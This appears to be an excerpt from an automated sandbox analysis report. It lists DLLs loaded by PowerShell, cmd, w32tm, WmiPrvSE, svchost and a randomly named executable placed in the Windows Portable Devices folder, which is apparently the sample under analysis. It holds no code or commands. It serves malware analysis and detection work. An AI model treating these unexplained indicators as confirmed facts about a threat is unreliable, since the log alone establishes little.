Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: mscoree.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: apphelp.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: version.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: wldp.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: profapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ktmw32.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: amsi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: userenv.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: dnsapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: winnsi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: rasapi32.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: rasman.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: rtutils.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: mswsock.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: winhttp.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: winmm.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: winmmbase.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: mmdevapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: devobj.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ksuser.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: avrt.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: audioses.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: powrprof.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: umpdc.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: msacm32.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: midimap.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: dwrite.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: edputil.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: windowscodecs.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ntmarta.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
